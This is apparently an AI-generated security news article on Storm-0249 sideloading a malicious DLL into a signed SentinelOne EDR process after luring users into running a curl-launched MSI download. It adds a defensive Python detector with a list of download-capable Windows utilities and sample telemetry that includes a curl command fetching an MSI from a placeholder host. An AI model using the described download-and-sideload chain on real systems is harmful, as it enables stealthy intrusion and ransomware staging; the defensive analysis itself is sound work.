Ethical Hacking News
Ransomware-linked intrusions have been abusing endpoint detection and response (EDR) components to run malware under the cover of a trusted process. A recent case attributed to Storm-0249 shows how attackers sideload a malicious DLL into a signed EDR binary to evade security tools and establish persistence on compromised systems. System administrators should therefore prioritise behaviour-based detection and tighten controls on suspicious activity, rather than trusting a process on the strength of its code signature alone.
Ransomware attacks are becoming increasingly sophisticated, with attackers abusing endpoint detection and response (EDR) components and trusted Microsoft Windows utilities to run malware.
Initial access brokers (IABs) such as Storm-0249 use these living-off-the-land techniques to bypass traditional, signature-based monitoring and hide malicious activity from defenders.
Social engineering campaigns trick users into running a download command themselves; the command fetches a malicious MSI package that installs a stealthy persistence mechanism.
The attack executes its payload inside a legitimate, signed process, which makes the activity hard for security tools to distinguish from normal EDR operation.
Organisations must rely on behaviour-based detection and set stricter controls for suspicious activities such as curl, PowerShell and other LoLBin execution.
Ransomware has long been a threat to computer systems and networks, but recent developments have highlighted the increasing sophistication of these attacks. According to a report from cybersecurity company ReliaQuest, an initial access broker (IAB) known as Storm-0249 has been abusing endpoint detection and response (EDR) components and trusted Microsoft Windows utilities to load malware, establish command-and-control communication, and maintain persistence in preparation for ransomware attacks.
This tactic is particularly concerning because it allows the attackers to bypass traditional monitoring methods. By loading its code through a signed SentinelOne EDR component, Storm-0249 runs malicious activity inside a process that defenders and security tooling are conditioned to trust. The approach has proven effective and difficult for security teams to counter, even though the underlying technique is well documented in threat intelligence.
The attack starts with a social engineering campaign that tricks users into running a curl command from the Windows Run dialog. The command downloads and installs a malicious MSI package, and the installer runs with SYSTEM privileges. The MSI drops a malicious DLL (SentinelAgentCore.dll) alongside a legitimate, signed SentinelAgentWorker.exe. When the signed worker starts it loads the attacker's DLL, a DLL sideload, so the payload executes within a trusted EDR process and obtains stealthy persistence that survives operating system updates.
Executing malicious code through legitimate, signed processes is a hallmark of advanced threats and makes the activity hard for security tools to detect. According to ReliaQuest, once the attacker gains access, they collect system identifiers with built-in Windows utilities such as reg.exe and findstr.exe, and funnel command-and-control (C2) traffic over encrypted HTTPS so that it blends in with ordinary outbound web traffic.
This attack highlights the need for system administrators to rely on behaviour-based detection: alert when a trusted, signed process loads an unsigned DLL, or a DLL from a non-standard path, instead of trusting the process because of who signed it. It is equally important to set stricter controls on curl, PowerShell and other LoLBin execution, in particular when such utilities are launched directly from the shell as happens with a command typed into the Run dialog, to prevent similar attacks in the future.
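The two detections described above, as an added example that is not part of the article or ReliaQuest's report: a small behaviour-based detector over Sysmon-style telemetry (Event ID 7 image loads and Event ID 1 process creations). It flags a signed loader pulling in an unsigned DLL or a DLL outside the standard install and system directories, and a download/execution LoLBin spawned directly by explorer.exe, which is what a Run-dialog launch looks like. The flat dict event shape, the LoaderSigned field (assumed to come from correlating the loader's own process-creation event, since Sysmon only records the signature of the loaded image), the directory list and every sample record are constructed for this example.

```python
"""Behaviour-based detection for the sideload and Run-dialog patterns.

Added example, not code from the article or from ReliaQuest. Events are flat
dicts using Sysmon-style field names; LoaderSigned is an assumed enrichment
field, and all sample telemetry below is constructed.
"""
import ntpath
from typing import Optional

# Directories where legitimately installed, signed software normally lives.
TRUSTED_DIRS = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\",
)

# Download/execution utilities an interactive user should rarely start
# straight from explorer.exe (the parent of anything run from the Run dialog).
RUN_DIALOG_LOLBINS = {"curl.exe", "powershell.exe", "pwsh.exe", "msiexec.exe",
                      "mshta.exe", "certutil.exe", "bitsadmin.exe"}


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def in_trusted_dir(path: str) -> bool:
    return _norm(path).startswith(TRUSTED_DIRS)


def basename(path: str) -> str:
    return ntpath.basename(_norm(path))


def check_image_load(ev: dict) -> Optional[str]:
    """Sysmon Event ID 7. Flag a signed loader pulling in a DLL that is
    unsigned or lives outside the standard install/system directories."""
    if ev.get("LoaderSigned") != "true":
        return None                      # only trusted loaders are of interest here
    dll = ev["ImageLoaded"]
    unsigned = ev.get("Signed") != "true"
    odd_path = not in_trusted_dir(dll)
    if not (unsigned or odd_path):
        return None
    why = []
    if unsigned:
        why.append("unsigned DLL")
    if odd_path:
        why.append("non-standard path")
    return f"signed process {basename(ev['Image'])} loaded {dll} ({', '.join(why)})"


def check_process_create(ev: dict) -> Optional[str]:
    """Sysmon Event ID 1. Flag download/execution LoLBins spawned by the shell."""
    child = basename(ev["Image"])
    parent = basename(ev.get("ParentImage", ""))
    if parent == "explorer.exe" and child in RUN_DIALOG_LOLBINS:
        return f"{child} started from explorer.exe: {ev.get('CommandLine', '')}"
    return None


def scan(events: list) -> list:
    """Run both checks over a batch of events and return the findings."""
    findings = []
    for ev in events:
        if ev["EventID"] == 7:
            finding = check_image_load(ev)
        elif ev["EventID"] == 1:
            finding = check_process_create(ev)
        else:
            finding = None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: a benign system DLL load, the sideload pattern
# with both files dropped into an attacker-chosen directory, a curl launched
# from the Run dialog, and a curl launched from cmd.exe that should not alert.
# Paths, the hostname and the command lines are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true", "LoaderSigned": "true"},
    {"EventID": 7, "Image": r"C:\ProgramData\Example\SentinelAgentWorker.exe",
     "ImageLoaded": r"C:\ProgramData\Example\SentinelAgentCore.dll", "Signed": "false", "LoaderSigned": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "curl -o C:\\Users\\Public\\update.msi https://example.invalid/update.msi"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl https://example.invalid/api"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

The image-load rule deliberately keys on the loader's signature rather than its path, because the sideloaded worker in this case is a genuine signed binary copied to a directory the attacker controls; a rule that only trusted Program Files paths would still catch the DLL, but the signature check is what makes "trusted process loads untrusted code" explicit. In production, the explorer.exe parent check should be tuned per environment, since some users legitimately start PowerShell from the Start menu.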
The use of IABs like Storm-0249 underscores the importance of staying informed about emerging threats and adopting robust security measures to mitigate their impact. As the threat landscape continues to evolve, it will be crucial for organizations to stay vigilant and adapt their defenses accordingly.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomware-IAB-Abuses-EDR-for-Stealthy-Malware-Execution-A-Growing-Concern-ehn.shtml
https://www.bleepingcomputer.com/news/security/ransomware-iab-abuses-edr-for-stealthy-malware-execution/
Published: Tue Dec 9 09:27:57 2025 by llama3.2 3B Q4_K_M